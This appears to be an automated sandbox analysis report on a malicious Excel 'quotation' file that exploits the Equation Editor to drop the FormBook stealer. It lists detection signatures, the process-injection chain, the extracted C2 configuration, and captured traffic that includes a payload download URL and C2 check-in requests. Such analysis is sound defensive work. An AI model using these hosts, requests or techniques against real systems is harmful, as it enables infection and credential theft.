Loading ...

Play interactive tourEdit tour

Windows Analysis Report (QUOTATION)B-RUS-20061REV2.xlsx

Overview

General Information

Sample Name:(QUOTATION)B-RUS-20061REV2.xlsx
Analysis ID:491355
MD5:ecd068fb962c5a9452a6f22c0725521c
SHA1:fdf1a902181584d47cb1aed7ac2ca333dcc62e5e
SHA256:3c3d0f13af1ccf38e72804d40b87dc215813ff6b36a20137d48c4a565c5a5c2e
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1928 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2792 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2796 cmdline: 'C:\Users\Public\vbc.exe' MD5: 50568FB6133EE4ED721EE46A3C0A9E98)
      • vbc.exe (PID: 2024 cmdline: C:\Users\Public\vbc.exe MD5: 50568FB6133EE4ED721EE46A3C0A9E98)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • autofmt.exe (PID: 2820 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: A475B7BB0CCCFD848AA26075E81D7888)
          • msiexec.exe (PID: 2308 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
            • cmd.exe (PID: 1124 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.odysseysailingsantorini.com/cmsr/"], "decoy": ["dahlia-dolls.com", "iamawife.com", "gardunomx.com", "roweelitetrucking.com", "asapvk.com", "strategieslimited.com", "healthyweathorganics.com", "wedding-gallery.net", "fastoffer.online", "biolab33.cloud", "los40delocta.com", "charliepaton.com", "jenpaddock.com", "zzmweb.com", "poetarts.com", "techwork4u.com", "tracylynpropp.com", "rkbodyfit.site", "migaleriapanama.com", "cosmostco.com", "johnsoncamping.com", "flowfinancialplanning.com", "xn--caamosdemexico-rnb.com", "plusqueindia.com", "wwwhyprr.com", "benimofis.com", "tandteutopia.com", "spaintravelvacation.com", "dear.services", "zhiwugongfang.com", "blogdavnc.com", "justicefundingexchange.com", "alphasecreweb.info", "xitechgroup.com", "kendalmountain.digital", "nieght.com", "pieter-janenmaaike.online", "myexclusiveshop.com", "love-potato.online", "mondebestglobal.com", "ranchlandconcierge.com", "southerngraphx.com", "pray4usa.info", "vilchesfinancial.com", "zelvio.store", "zenibusiness.com", "kindredhue.com", "californiatacosdinuba.com", "uncommonsolutionsllc.com", "easy-lah.com", "disciplesevents.com", "856380127.xyz", "zapzapgone.com", "paradisgrp.com", "programmerworks.info", "purchasesuite.com", "dorotajedrusik.com", "555999dy.com", "uvoyus.com", "utang.net", "elizabethhelma.com", "noseainsight.com", "simpleterior.com", "casatensina.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.466320044.00000000024B1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x183f9:$sqlite3step: 68 34 1C 7B E1
      • 0x1850c:$sqlite3step: 68 34 1C 7B E1
      • 0x18428:$sqlite3text: 68 38 2A 90 C5
      • 0x1854d:$sqlite3text: 68 38 2A 90 C5
      • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
      00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Click to see the 25 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.vbc.exe.25b91f4.3.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          5.2.vbc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            5.2.vbc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            5.2.vbc.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
            • 0x175f9:$sqlite3step: 68 34 1C 7B E1
            • 0x1770c:$sqlite3step: 68 34 1C 7B E1
            • 0x17628:$sqlite3text: 68 38 2A 90 C5
            • 0x1774d:$sqlite3text: 68 38 2A 90 C5

            Sigma Overview

            Exploits:

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 180.214.239.85, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2792, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2792, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2792, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2796
            Sigma detected: Execution from Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2792, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2796

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.odysseysailingsantorini.com/cmsr/"], "decoy": ["dahlia-dolls.com", "iamawife.com", "gardunomx.com", "roweelitetrucking.com", "asapvk.com", "strategieslimited.com", "healthyweathorganics.com", "wedding-gallery.net", "fastoffer.online", "biolab33.cloud", "los40delocta.com", "charliepaton.com", "jenpaddock.com", "zzmweb.com", "poetarts.com", "techwork4u.com", "tracylynpropp.com", "rkbodyfit.site", "migaleriapanama.com", "cosmostco.com", "johnsoncamping.com", "flowfinancialplanning.com", "xn--caamosdemexico-rnb.com", "plusqueindia.com", "wwwhyprr.com", "benimofis.com", "tandteutopia.com", "spaintravelvacation.com", "dear.services", "zhiwugongfang.com", "blogdavnc.com", "justicefundingexchange.com", "alphasecreweb.info", "xitechgroup.com", "kendalmountain.digital", "nieght.com", "pieter-janenmaaike.online", "myexclusiveshop.com", "love-potato.online", "mondebestglobal.com", "ranchlandconcierge.com", "southerngraphx.com", "pray4usa.info", "vilchesfinancial.com", "zelvio.store", "zenibusiness.com", "kindredhue.com", "californiatacosdinuba.com", "uncommonsolutionsllc.com", "easy-lah.com", "disciplesevents.com", "856380127.xyz", "zapzapgone.com", "paradisgrp.com", "programmerworks.info", "purchasesuite.com", "dorotajedrusik.com", "555999dy.com", "uvoyus.com", "utang.net", "elizabethhelma.com", "noseainsight.com", "simpleterior.com", "casatensina.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: (QUOTATION)B-RUS-20061REV2.xlsxReversingLabs: Detection: 28%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
            Antivirus detection for URL or domainShow sources
            Source: http://180.214.239.85/service/rundll32.exeAvira URL Cloud: Label: malware
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exeReversingLabs: Detection: 13%
            Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 13%
            Source: 5.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.507251158.00000000007CA000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, msiexec.exe
            Source: global trafficDNS query: name: www.paradisgrp.com
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 180.214.239.85:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 180.214.239.85:80

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2022566 ET TROJAN Possible Malicious Macro EXE DL AlphaNumL 192.168.2.22:49165 -> 180.214.239.85:80
            Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 180.214.239.85:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 128.65.195.232:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 128.65.195.232:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 128.65.195.232:80
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.paradisgrp.com
            Source: C:\Windows\explorer.exeNetwork Connect: 128.65.195.232 80
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeDomain query: www.uvoyus.com
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.odysseysailingsantorini.com/cmsr/
            Source: Joe Sandbox ViewASN Name: INFOMANIAK-ASCH INFOMANIAK-ASCH
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
            Source: global trafficHTTP traffic detected: GET /cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA== HTTP/1.1Host: www.paradisgrp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEp HTTP/1.1Host: www.uvoyus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 Sep 2021 12:04:10 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Mon, 27 Sep 2021 09:26:10 GMTETag: "a7600-5ccf6b00272b4"Accept-Ranges: bytesContent-Length: 685568Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cf 8d 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6a 0a 00 00 0a 00 00 00 00 00 00 ee 88 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c 88 0a 00 4f 00 00 00 00 a0 0a 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 69 0a 00 00 20 00 00 00 6a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 06 00 00 00 a0 0a 00 00 08 00 00 00 6c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 74 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 88 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 dc 43 02 00 f0 f2 00 00 03 00 00 00 01 01 00 06 cc 36 03 00 d0 51 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 02 03 7d 01 00 00 04 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 06 00 00 04 2a 1e 02 7b 06 00 00 04 2a 22 02 03 7d 07 00 00 04 2a 1e 02 7b 07 00 00 04 2a 22 02 03 7d 08 00 00 04 2a 1e 02 7b 08 00 00 04 2a 22 02 03 7d 09 00 00 04 2a 1e 02 7b 09 00 00 04 2a 22 02 03 7d 0a 00 00 04 2a 1e 02 7b 0a 00 00 04 2a 22 02 03 7d 0b 00 00 04 2a 1e 02 7b 0b 00 00 04 2a 22 02 03 7d 0c 00 00 04 2a 1e 02 7b 0c 00 00 04 2a 22 02 03 7d 0d 00 00 04 2a 1e 02 7b 0d 00 00 04 2a 22 02 03 7d 0e 00 00 04 2a 1e 02 7b 0e 00 00 04 2a 22 02 03 7d 0f 00 00 04 2a 1e 02 7b 0f 00 00 04 2a 22 02 03 7d 10 00 00 04 2a 1e 02 7b 10 00 00 04 2a 13 30 02 00 71 00 00 00 00 00 00 00 02 28 17 00 00 0a 00 00 02 16 28 1
            Source: global trafficHTTP traffic detected: GET /service/rundll32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.85Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.85
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 12:05:31 GMTServer: ApacheVary: accept-language,accept-charsetUpgrade: h2Connection: Upgrade, closeAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 31 0d 0a 77 65 62 6d 61 73 74 65 72 40 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6d 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 